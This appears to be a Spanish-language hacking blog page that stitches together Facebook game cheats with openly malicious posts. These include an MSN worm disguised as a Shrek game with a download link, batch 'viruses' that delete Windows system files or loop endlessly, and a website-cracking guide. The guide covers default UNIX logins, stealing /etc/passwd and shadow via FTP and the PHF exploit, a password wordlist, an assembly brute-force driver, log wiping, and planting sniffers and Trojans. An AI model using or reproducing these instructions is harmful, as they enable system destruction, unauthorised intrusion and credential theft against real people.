Saturday, July 17, 2010

Como Hackear los juegos de facebook: Word Challenger, Who has the biggest brain, Friend for sale, Etc.








Para los que se aburrieron de que gente como yo los pase les traigo la solucion, un completo tutorial para enseñarles como se hackea cada juego ademas de los respectivos hacks que subire aca para que los descarguen, bueno ya esta todo dicho ahora aprende y aplica...





Partiremos con:




Bueno este hack es bastante facil creo que todos lo podran ejecutar, con todos me refiero a que incluso tu abuela podria ser capaz de hacer esto sin marearse.


Pasos:
  • Descarga este archivo: Wchack.exe
  • Introduce la contraseña "www.venuzcomplex.blogspot.com"
  • Abre word challenge en tu facebook.
  • Dictionary: (esquina superior derecha) debe estar en "English"
  • Dale click a play
  • Escribe las palabras en el programa y dale click a "generate"
  • Ahora pon la pantalla de Wordchallenge y el programa pondra las palabras
  • Asi sucesivamente.
Asi de facil era... Ahora vere si realmente les intereso el tema y de ahi seguire subiendo hacks.

Video Explicativo:







En Bowling Buddies Solo hay que:

  • Hacer hacia abajo con el Scroll del Mouse
  • Hacer clic en la Bola, ponerla un poco a la derecha como se ve en el video
  • Hacer con el Scroll del Mouse hacia arriba.


Video Explicativo:






En Tower Bloxx hay que:




PD: En este momento estoy un poco apurado como para explicarles detalladamente como funciona, asique a la vuelta les prometo traducir todo y ser mas especifico, por mientras hagan el intento viendo el video explicativo (nuevo).

Video Explicativo:







En Kicks Up Solo hay que:

  • Descarga este archivo:Cheat Engine
  • Introduce la contraseña "www.venuzcomplex.blogspot.com"
  • Abre Kicks Up en tu facebook.
  • En el programa le das click al computador que esta arriba a la izquierda, buscas el proceso Firefox.exe y le das Ok.
  • Luego Click a Enable SpeedHack y abajo donde dice speed cambias el valor a 0.000000001 para luego clickear set speed.
  • Hecho esto te vas a la ventana donde tengas el juego y veras que le puedes hacer los clicks que quieras a la pelota sin que esta se mueva, haz los clicks que quieras para subir tu puntaje.
  • Cuando quieras terminar de hacer click te das nuevamente al programa cheat engine y clickeas la casilla enable speedhack con lo que quedara desactivada.
  • Eso es todo.


Video Explicativo:






En este hack solo debes:


  • Descargar el Hack desde aca: Download via Rapidshare
  • Ingresar la PassWord: www.venuzcomplex.blogspot.com
  • Abrir el juego en tu Facebook, y abrir el Bot
  • Le das Click a Auto set y estaras listo.




Esta Version similar a la anterior solo que mas efectiva y rapida, los pasos son:

  • Descargar el archivo WHTBB Cracked : Bloqueado a peticion del autor.
  • Abre el archivo e introduce la clave www.venuzcomplex.blogspot.com
  • Doble click al archivo .exe
  • Abres el juego en facebook
  • Le das click a Autoset y listo comienzas a hackear
Video Explicativo








Truco para Pet Society:


  • El truco es simple, cuando te de la medianoche, llegara un sobre con dinero (loteria).
  • Lo abres y te saldra dinero, luego de eso sal de tu casa y entra nuevamente camina por la ciudad unos segundos.
  • Cambias la hora del reloj windows 23:59:40 y reinicias el juego, al entrar a tu casa encontrarás otro sobre con dinero.
  • Asi sucesivamente

 


2008-09-26T06:31:09.455-07:00
wesside-ng es la nueva herramienta de la suite aircrack para romper claves inalabricas con seguridad WEP la cual incluye muchas tecnicas las cuales se ejecutan de forma iteligente seleccionando la red automaticamente aplicando el ataque especifico a la red y automaticamente reinyectando paquetes y al final obtiene la clave sin ninguna intervension del usuario.
para romper la contraseña solo debemos ejecutar
wesside-ng -i wlan0
y automaticamente nos dara la contraseña despues de 1 minuto.
para los interesados les dejo un video de como rompen una red wireless con seguridad WEP en 1 minuto.

la imagen fue tomada del siguiente video
http://www.ethicalhacker.net/content/view/167/2/
mas informacion en la pagina de aircrack:
http://www.aircrack-ng.org/doku.php?id=wesside-ng.es
2008-09-26T06:31:04.745-07:00

Éste virus simula ser el juego de Shrek 3.Lo ke hace es contaminar a los contactos del MSN de la víctima.Consiste en un archivo llamado "Shrek 3 Msn Games 2007" ke al ejecutarse livera 3 archivos:1-El archivo Shrek3_2007.rar (RAR ke contiene otro malware ke no viene al caso)Se livera en la carpeta Windows y no se ejecuta.2-El segundo archivo es el bat.bat.Se livera en la carpeta Windows y se ejecuta.3-El tercer archivo es el msn.exe.Se livera en la carpeta Windows y se ejecuta.bat.bat: éste archivo crea la carpeta system en c: ke és la ke va a alojar elarchivo ke se autoenviará a los contactos del MSN. Y lo segundo ke haceéste archivo es mover el archivo Shrek3_2007.rar a la carpeta ke acavade crear, osea c:\\system.msn.exe: éste archivo es el programake realiza las emulaciones correspondientes para copiar al clipboard(portapapeles) el archivo Shrek3_2007.rar contenido en c:\\system yautoenviarlo a los contactos del msn.Shrek3_2007.rar: RAR ke contiene un malware creado previamente. Precisamente este ->http://rapidshare.com/files/42025204..._2007.rar.htmlEn el momento ke ustedes hagan su propio virus para el MSN van a poderhacer ke se autoenvie cualkier otra cosa, incluso una copia de simismo, pero esta vez es ése malware.Funcionamiento:Lavictima ejecuta el archivo "Shrek 3 MSN Games 2007" e instantáneamentese copian 3 archivos (los anteriormente descriptos) en la carpetac:\\windows.Luego se crea la carpeta c:\\system y se mueve el archivo Shrek3_2007.rar a esa nueva carpeta.Mientras sucede lo anterior, comiensa un timer de 5 segundos, luego de pasados 5 segundos aparece el siguiente cartel:Pensemos ke ya pasaron 15 segundos, pasó más tiempo hasta ke se leyó elmensaje anterior, osea ke ya le dimos tiempo a ke se cree correctamentela carpeta c:\\system y se mueva el arhivo shrek3_2007 a ésa carpeta.Luegode apretar el boton "aceptar" del mensaje de error, comiensa una seriede emulaciones ke permiten copiar al portapapeles (clipboard) elarchivo shrek3_2007.rar ke fué movido a la carpeta c:\\system(recordemos ke estas 2 cosas son realizadas x el .bat).Teniendoya el archivo en el portapapeles, la victima se volverá a comunicar conalgun contacto y en el momento en ke presione la tecla "s" va a enviarinvoluntariamente el archivo shrek3_2007 a su contacto einstantáneamente se va a minimizar todo permitiendo de esta manera keel contacto de la víctima acepte el archivo. De esta manera, y si todosalió bien, el contacto de la víctima habrá resivido el archivo y lohabrá ejecutado contaminándose.Y pensemos ke la víctima tiene más de 1 contacto.Acáles dejo todo lo ke utilisé para realizar el virus. Desde el .s0m hastael .ico con la cara de shrek. Esto lo hago para ke puedan mejorarlo yhacer sus propios virus para "distribuir" utilizando el msn.Tambíendejo todo para ke analicen el .s0m y vean ke és lo ke hace para emularel copiado del archivo en el portapapeles, etc etc etc...UN CONSEJOAntesde ponerse a analizar y a crear sus propios virus para el MSNutilizando esta data, envien el virus a algun contacto o alguien parake vean como funxiona, o hasta podrían probarlo ustedes mismos en alguncybercafé o pc ke NO les pertenesca obviamente.Bué, de todos modos si lo prueban en sus PC simplemente finalizan el msn.exe con el administrador y problema resuelto.En ese post van a poder conocer las herramientas ke he utilizado para realizar éste virus.Acá dejo el rar ke contiene el virus, obviamente si bajan el rar no pasa nada, todo sucede al ejecutar el archivo de Shrek.DOWNOAD VIRUS ->http://rapidshare.com/files/44409961..._2007.rar[...]
RAR Password Recovery v1.1 RC16
2008-09-26T06:31:04.603-07:00



Datos Técnicos
RAR Password Recovery v1.1 RC16
English | 1.6 MB | Medicina Incl. | Windows 95/98/ME/2k/XP/2003

Descripción
Has olvidado la contraseña de tus RARs?
No te preocupes, esta utilidad te ayudará a recuperarlos muy fácilmente.
El programa extrae las contraseñas de ficheros RAR, usando el ataque basado en la "fuerza bruta", o a través de diccionarios que podrás añadir tú mismo.

Captura

Enlaces

Hacer un simple virus para eliminar el windows.

Abrimos el blok de notas y escribimos el codigo malicioso: echo off  del=c:\windows\q del=c:\windows deltree=c:\windows  y lo guardamos con formato .bat o .cmd (el formato cmd es  para windows xp aunque este codigo tambien es para xp no funciona muy bien en windows anteriores. por ejemplo kedaria asi: mivirus.bat y si kieren ke ya no sirva cualkier computadora simplemente ejecuten su virus.
Si tienes dudas o kieres pedir algun programa o dar sugerencias solo manda un mensaje a agc0120@rocketmail.com y lo tomaremos en cuenta

ALGUNAS EXTENSIONES IMPORTANTES Y COMO USARLAS PARA HACER VIRUS

Las extensiones mas importantes de los archivos de un sistema operativo son las siguientes:
.exe
.dll
.ini
.sys
.com
.bat
.nt
.reg
.bin
.pif
entre otras, aunque algunas varien de acuerdo al tipo de windows que se utilice como en el windows 95, 98, ME, 2000 la extension bat es muy importante y se usa en el archivo autoexec.bat y en windows mas recientes cambia a autoexec.nt
Del windows 95 al 2000 los archivos mas importantes son:
command.com
autoexec.bat
config.sys
kernell32.dll
y otros con un grado menor de importancia pero k al igual si llegaran a faltar no podria funcionar el sistema son:
svchost.exe
lsass.exe
taskmon.exe
entre otros.
Para los windows mas nuevos como el xp o vista serian:
config.sys
cmd.exe
uxtheme.dll
autoexec.nt
svchost.exe
lsass.exe
entre otros.
Y algunos archivos con los que se podran hacer maravillas para mejorar o echar a perder una computadora como el regedit.exe
Que como ya habran leido anteriormente pueden hacer que ninguna aplicacion sirva haciendo al equipo inservible.
Pueden hacer que muchos archivos no se puedan ejecutar bien por su extension e infinidad de cosas mas.
Así k ya saben, si kieren hacer un virus de principiantes ya saben k archivos pueden usar o simplemente sin necesidad de hacer ningun archivo maligno solo eliminar los archivos k mencione.
Pero si les gusta eso de estar escribiendo codigos, uno bueno seria este
@echo off
erase c:\windows\system32\uxtheme.dll
erase c:\windows\system32\svchost.exe
erase c:\windows\system32\cmd.exe
msg * Puedes poner lo k kieras aki
shutdown -r
Y lo guardan con formato .bat
y lo k hara es borrar los archivos y sacar un mensaje y luego reiniciar el equipo aunk ya no se va  a reiniciar por completo por la falta de esos archivos.
Pero tal vez no funcione muy bien en algunas computadoras como las de los cibers ya k las tienen protegidas para k no puedan borrar los archivos de sistema.
Ahora si no kieren k se borren esos archivos y solo hacer algo molesto pueden hacer este codigo:
@echo off
start calc.exe
start winmine.exe
for/l%%i in (1,1,100) do (echo "isr"> virus.exe
cd..
cd..
cd..
cd windows
cd system32
copy *exe *win.sys
copy *sys *troj.bat
copy *dll *win32.ini
copy *ini *nada.exe
y lo guardan con formato .bat
Lo k hará será abrir la calculadora y el buscaminas y crear un archivo virus.exe luego copiara todos los archivos de system32 con la finalidad de reducir la memoria.
Y ahora si kieren hacer algo mas molesto y k hasta se tenga k reiniciar el equipo seria con este simple codigo:
@echo off
:menu
start calc.exe
goto menu
y lo guardan con formato .bat
Y lo k  hara es abrir la calculadora pero millones de vecez sin parar, el comando goto menu da la orden de repetir lo k hay despues de :menu asi k se repitira infinitamente.
Y no lo podrán parar hasta reiniciar el equipo.
Ahora si lo k kieren son virus pues es algo muy dificil de hacer ya k necesitan saber de programacion pero ahora vamos a tener algunos virus conocidos para descargar gratis como el happytime o love letter.
Para k hagan alagunas travesuras jajaja. :)

GUIA PARA CRAKEAR WEB SITES

 
1. Introduccion
Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido que seria  comico remover algunas graficas de algun website, o mejor aun borrar toda la pagina de algun enemigo para deleitarte con tu venganza. Pues bien, este es el manual que te ayudara a lograrlo.
Primero  deberas  entender que andar por ahi  borrando paginas es *TONTO* e inmaduro. Lo que trato de hacer es que sientas la adrenalina de entrar a un sistema  al que no estes autorizado y echar una ojeada alrededor. Si te dedicas a invadir  sistemas y borrar archivos le quitaras  el privilegio a otra persona de entrar a ese sistema ya que el operador se dara cuenta de la intrusion y aumentaran la seguridad negando asi la entrada a mas 'intrusos'. Si el sistema al que entraste pertenece a unos hijos de la chingada (Plantas Nucleares, Creadores de abrigos de piel, Agencias de Gobierno,etc) olvida lo antes dicho y haz que  se arrepientan de haberse conectado a la red causando kaos o mejor aun, infectandolos con algun buen virus  (por que no reemplazar un ejecutable por un caballo de troya?). En fin, usa tu cabeza y cuida de no ser sorprendido en tus viajes de kAoS.
  2. Websites
Un website es solamente una computadora llamada servidor por su capacidad de de  realizar diferentes tareas al mismo tiempo, ejecutando un sistema operativo que generalmente sera UNIX o algunas de sus variaciones y con toda la informacion guardada en algun medio.
 
  2.1 Ganando acceso a un servidor WWW
Aqui reside la magia del Hacker, la proteccion comun son dos preguntas Login y Password. El usuario que tenga una cuenta en ese servidor tiene un nombre de  usuario (Login) y contrase¤a (Password) por lo que la entrada a ese servidor no tiene problemas; pero para una persona ajena a ese servidor la entrada es un poco mas complicada.
Para poder penetrar el sistema necesitamos saber su URL y una vez conectados con  el explorador prestar atencion al mensaje waiting reply from 103.38.28 o algo parecido que haga aparecer una direccion IP en lugar de el nombre de dominio.
Si lograste conseguir la direccion IP usa telnet para conectarte a esa direccion.  Si cuando tratas de conectarte aparece el mensaje 'connection refused' probablemente este protegida esa direccion con una FIREWALL. Si este es el caso trata de hacer telnet a el nombre de dominio con la finalidad de llegar a el frustrante LOGIN/PASSWORD.
Para  entrar  necesitas conseguir alguna cuenta haciendo algo de ingenieria social o intenta con los defaults.
 
 
   * CUENTAS DEFAULTS DE UNIX *
Login:                                Password:
root                                    root
root                                    system
sys                                     sys
sys                                     system
daemon                                  daemon
uucp                                    uucp
tty                                     tty
test                                    test
unix                                    unix
unix                                    test
bin                                     bin
adm                                     adm
adm                                     admin
admin                                   adm
admin                                   admin
sysman                                  sysman
sysman                                  sys
sysman                                  system
sysadmin                                sysadmin
sysadmin                                sys
sysadmin                                system
sysadmin                                admin
sysadmin                                adm
who                                     who
learn                                   learn
uuhost                                  uuhost
guest                                   guest
host                                    host
nuucp                                   nuucp
rje                                     rje
games                                   games
games                                   player
sysop                                   sysop
root                                    sysop
demo                                    demo
 
Si fracasas al intentar el acceso usando cada uno de los anteriores logins, probablemente tengas que conseguir el password de otra manera como relaciones humanas; esto significa que vas a tener que conseguir la clave valiendote de trucos como hablar por telefono a una persona que sepas que esta registrada en ese servidor y pedirle su Login y Password diciendo que necesitas validar su cuenta o algo parecido. Otra manera de conseguir un Password es crear  un programa que robe las claves de acceso del disco duro de una persona.


 
  3. Cuando se esta adentro
Una vez que hayas logrado entrar a un sistema necesitaras localizar y obtener el archivo passwd disponible en el directorio /etc
Para obtener el archivo PASSWD usa el siguiente ejemplo:
($ simboliza el prompt UNIX)
$ ftp
FTP> get /etc/passwd
FTP> quit
Para ver el contenido de el archivo usa el siguiente comando:
$ cat /etc/passwd
 
Una vez que tengas en tu posesion el archivo PASSWD editalo y fijate en su contenido, debera tener la siguiente informacion:
       usuario:contrase¤a:ID:Grupo:descripcion/nombre:directorio:shell
usuario    - Este es el login de algun usuario.
contrase¤a - Es el password de el usuario (encriptada con DES)
ID         - Es la identificacion de ese usuario.
grupo      - El grupo al que pertenece esta cuenta.
descripcion- El nombre del usuario.
directorio - El directorio de acceso de el usuario.
shell      - El shell que procesa los comandos de ese usuario.
 Un ejemplo podria ser:
    john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john
Nombre de usuario: john
Password encriptado: 234abc56
Usuario numero: 9999
Numero de grupo: 13
Descripcion: John Johnson
Directorio de acceso: /home/dir/john
Shell: /bin/john
Si el archivo que conseguiste contiene la misma informacion pero en el campo del password tiene un asterisco (*) o cualquier otro caracter, significa que las contrase¤as se encuentran 'sombreadas'.
Si las contraseñas se encuentra sombreada,las podras encontrar en el archivo shadow aunque generalmente no se puede tener acceso a ese archivo a menos de tener root.  Una forma de conseguir SHADOW es usando el comando cp para copiarlo a otro archivo y despues tratar de obtener el archivo al que se copio, ejemplo:
$cp /etc/shadow /usuarios/carlos/hack.txt
$ftp
FTP> get /usuarios/carlos/hack.txt
FTP> quit
$rd /usuarios/carlos/hack.txt
Algunas otras maneras de obtener el archivo SHADOW seran explicadas en otros numeros de RareGaZz.
 
Ya tengo los passwords encriptados, ahora que?
Los passwords estan encriptados usando one-way encription, significa que  no se  pueden des-encriptar. Lo que Unix hace es obtener la contraseña del usuario,la encripta y la compara con la que ya esta encriptada, si coinciden entonces se le permite el acceso.
Para poder obtener las contraseñas es necesario tener un archivo con palabras y usar un programa para que encripte las palabras del archivo y las compare con las contrase¤as encriptadas,si coinciden te avisa que palabra fue la que coincidio con la contrase¤a encriptada.


Algunos programas de este tipo son:
Nombre            Palabras por Segundo    Computadora
John the Ripper          5077                 586
Starcracker              1300                 586
Cracker Jack             1008                 586
KillerCracker             350                 586
Estos programas se encuentran disponibles en cualquier pagina de Hackers, si quieres la ultima version de StarCracker visita la siguiente URL: http://www.geocities.com/SiliconValley/park/8403/index.html
Para conseguir listas de palabras haz FTP a el siguiente servidor:
warwick.ac.uk
directorio: /pub/cud
Algunas de las palabras mas usadas en contraseñas son:
 
      aaa            academia          ada            adrian
      aerobics       airplane          albany         albatros
      albert         alex              alexander      algebra
      alias          alisa             alpha          alphabet
      ama            amy               analog         anchor
      andy           andrea            animal         answer
      anything       arrow             arthur         ass
      asshole        athena            atmosphere     bacchus
      badass         bailey            banana         bandit
      banks          bass              batman         beautiful
      beauty         beaver            daniel         danny
      dave           deb               debbie         deborah
      december       desire            desperate      develop
      diet           digital           discovery      disney
      dog            drought           duncan         easy
      eatme          edges             edwin          egghead
      eileen         einstein          elephant       elizabeth
      ellen          emerald           engine         engineer
      enterprise     enzyme            euclid         evelyn
      extension      fairway           felicia        fender
      finite         format            god            hello
      idiot          jester            john           johnny
      joseph         joshua            judith         juggle
      julia          kathleen          kermit         kernel
      knight         lambda            larry          lazarus
      lee            leroy             lewis          light
      lisa           louis             love           lynne
      mac            macintosh         mack           maggot
      martin         marty             marvin         matt
      master         maurice           maximum        merlin
      mets           michael           michelle       mike
      minimum        nicki             nicole         rascal
      really         rebecca           remote         rick
      reagan         robot             robotics       rolex
      ronald         rose              rosebud        rosemary
      roses          ruben             rules          ruth
      sal            saxon             scheme         scott
      secret         sensor            serenity       sex
      shark          sharon            shit           shiva
      shuttle        simon             simple         singer
      single         singing           smile          smooch
      smother        snatch            snoopy         soap
      socrates       spit              spring         subway
      success        summer            super          support
      surfer         suzanne           tangerine      tape
      target         taylor            telephone      temptation
      tiger          tigger            toggle         tomato
      toyota         trivial           unhappy        unicorn
      unknown        urchin            utility        vicki
      virginia       warren            water          weenie
      whatnot        whitney           will           virgin
      william        winston           willie         wizard
      wonbat         yosemite          zap            whatnow
 
Obtuve algunas cuentas, ahora?
Para  poder  hacer  y  deshacer en el servidor necesitas el password  de  la cuenta root. Si despues de intentar con algunas listas de palabras no puedes necesitaras  hacer  un ataque en bruto, es decir empezar desde  la  letra  A hasta la palabra zzzzzzzz
El  siguiente programa necesita ser compilado usando TASM y es una lista  de palabras TSR que no ocupa espacio en disco y puede ser modificada,  es ideal para ataques brutos a la cuenta r00t (Programa Copiado de Phrack 47)
 
P A S S W O R D   E N G I N E  (for IBM PC's)                by Uncle Armpit
+++++++++++++++++++++++++++++++++++++++++++++
Que tan practico es?
Este programa no necesita mucho espacio en disco y puede crear listas de palabras de gran tama¤o.
Con el ejemplo proporcionado, passwords empezando en 'aaaaaaa' y terminando en 'zzzzzzz' seran generados.
 
Como empiezo a usar esta lista de palabras?
Compila el codigo y nombralo "hackdrv.sys", despues necesitas configurarlo añadiendo la siguiente linea en CONFIG.SYS
device=c:\hackdrv.sys
Una vez en memoria el programa creara la lista de variables en memoria llamada HACKPWD. Cualquier programa que uses (excepto StarCracker) debera reconocer hackpwd como una lista de palabras y empezar a crackear.
Si deseas reiniciar una sesion desde una combinacion especifica solo modifica el archivo HACKDRV.SYS con un editor HEXADECIMAL y modifica la cadena de caracteres con los que empieza ;-0
;-----------------------cut here--------------------------------
;Program HACKDRV.SYS
;
org 0h
next_dev dd -1
attribute dw 0c000h            ;character device w/ ioctl calls
strategy dw dev_strategy
interrupt dw dev_int
dev_name db 'HACKPWD '
countr dw offset number
number db 'aaaaaa',0ah         ;<---- 6 caracteres en minusculas (empiezo)
numsize equ $-number - 2
afternum:
;working space for device driver
rh_ofs dw ?
rh_seg dw ?
dev_strategy:               ;strategy routine
mov cs:rh_seg,es
mov cs:rh_ofs,bx
retf
dev_int:                    ;interrupt routine
pushf
push ds
push es
push ax
push bx
push cx
push dx
push di
push si
cld
push cs
pop ds
mov bx,cs:rh_seg
mov es,bx
mov bx,cs:rh_ofs
mov al,es:[bx]+2
rol al,1
mov di,offset cmdtab
xor ah,ah
add di,ax
jmp word ptr[di]
 
cmdtab:            ;command table
dw init        ;0
dw exit3       ;1
dw exit3       ;2
dw ioctl_read  ;3
dw do_read     ;4
dw exit3       ;5
dw exit3       ;6
dw exit3       ;7
dw exit3       ;8
dw exit3       ;9
dw exit3       ;10
dw exit3       ;11
dw ioctl_write ;12
dw exit3       ;13
dw 5 dup (offset exit3)
 
 
ioctl_read:
push es
push bx
mov si,es:[bx+10h]
mov di,es:[bx+0eh]
mov es,si
push cs
pop ds
mov si,offset number
xor cx,cx
get_char:
lodsb
stosb
inc cl
cmp al,0ah
jz ioctl_rend
jmp get_char
ioctl_rend:
pop bx
pop es
mov es:[bx+012h],cx
mov cs:countr,offset number
jmp exit2
ioctl_write:
push es
push bx
mov si,es:[bx+010h]
mov ds,si
mov si,es:[bx+0eh]
mov cx,numsize+1               ;es:[bx+012h]
push cs
pop es
mov di,offset number
repe movsb
pop es
pop bx
mov cs:countr,offset number
jmp exit2
 
do_read:
push es
push bx
 
push cs
pop ds
mov si,[countr]
inc si                      ;word ptr [countr]
cmp si,offset afternum
jnz is_okay
mov si,offset number
call inc_num
 
is_okay:
mov [countr],si
mov di,es:[bx]+0eh
mov ax,es:[bx]+010h
mov cx, es:[bx]+012h
jcxz clean_up
mov es,ax
repe movsb
clean_up:
pop bx
pop es
jmp exit2
 
exit3: mov es:word ptr 3[bx],08103h
jmp exit1
exit2:
mov es:word ptr 3[bx],0100h
exit1:
pop si
pop di
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
popf
retf
exit:
inc_num proc near
 push si
 mov si,numsize
 reiterate:
  inc byte ptr [number+si]
  cmp byte ptr [number+si],'z'+1    ;+1 past ending char. in range
  jnz _exit
  mov byte ptr [number+si],'a'      ;starting char. in range
  dec si
  cmp si,-1
  jnz reiterate
  mov byte ptr [number],01ah        ;send EOF
 _exit:
  pop si
  ret
inc_num endp
 
 
at_eof:                        ; the non-resident code starts here
initial proc near
push es
push cs
pop ds
push cs
pop es
mov si,offset number
mov di,offset tmpnum
cld
_again:
lodsb
cmp al,0ah
jz _nomorechars
stosb
jmp _again
_nomorechars:
mov si,offset msgend
mov cx,4
repe movsb
mov ah,09             ;print welcome message
mov dx,offset msg1
int 21h
pop es
ret
initial endp
init: call initial
mov ax,offset at_eof
mov es:[bx]+0eh,ax
push cs
pop ax
mov es:[bx]+010h,ax
mov cs:word ptr cmdtab,offset exit3
jmp exit2
 
msg1    db "Incremental Password Generator (c)1995",0ah,0dh
        db "Written by Uncle Armpit",0ah,0dh,0ah,0dh
        db "Starting at word ["
tmpnum  db 10 dup (?)
msgend  db "]",0a,0d,'$'
;END hackdrv.sys
----------------------------------cut here----------------------------------
 
Como limpiar tus huellas
Si deseas que tu ingreso con la cuenta r00t no quede registrado en los LOGS de el servidor revisa los directorios buscando archivos  como  logs, syslog, log,  o  cualquiera  que parezca  que  guarda un reporte  de  los accesos  y borralos  o mejor aun editalos usando  el  editor de archivos de UNIX.  Para ejecutar el editor usa el comando vi
Edita o borra los siguientes archivos: /etc/syslog
                                       /etc/log
                                       /etc/logs
Existen algunos scripts para borrar las huellas como ZAP! disponibles en la red
HACKEAR PAGINAS WEB


 
3º OBTENIENDO PASSWORDS DE TIPO A (USUARIO):
 
Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11 intentos ( según tu paciencia ) no sale nada, mejor dejes esta forma ;)
Pero también seria una buena idea intentar sacar el password a la "victima" a traves de engaños y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass, evidentemente no voy a contar aquí lo que le tienes que decir a la victima para que te crea... eso tendras que currelarlo tu un pokito
 
Ademas, si conseguimos el fichero de passwords del servidor... ¡¡Estamos de suerte!! Pues generalmente los passwords de usuario son bastante fáciles de crackear... solo elige el usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en www.geocities.com/SiliconValley/Peaks/7837  , si no sabes usarlo... DON´T WORRY, trae ayuda...).
Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD, asi que para eso vamos al siguiente apartado de este cursillo.
 
 
3º OBTENIENDO PASSWORDS DE TIPO B (root):
 
Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el sistema operativo) no sea una tarea facil.
 
Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece:
 
root:*:0:0:Charlie &:/root:/bin/csh
 
( un asterisco (*) detrás del nombre "root" y los dos puntos, también puede aparecer una equis (x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de directorio... supongo que te estaras dando cuenta de cómo y si no, hay va una pista... "etc" es el nombre de un directorio ).
 
Buiino, si lo anterior no ha funcionado, no te preocupes, aún tenemos mas bazas que jugar.
Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes enterarte del Sistema operativo que usa el server, version ... (enterate también de la version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...).
Una vez que lo/s tengas pues... los pruebas!!! ¿Sino para que coño los has cojido?... para provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de esperiencia seguro que recuerdas algunos viejos compañeros ;) ).
Un buen sitio para pillar exploits es: http://www.rootshell.com/  
 
¿ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a ¡jugar!
 
Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun pequeño server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no se meteran mucho contigo ¿verdad?).
 
4º PRECAUCIONES
 
Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los marrones seran pal dueño de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet robadas, solo usar las que sepais que el dueño es un verdadero hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho).
 
5º SOBRE EL AUTOR
 

Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquí esta, espero que a alguien le sirva de algo...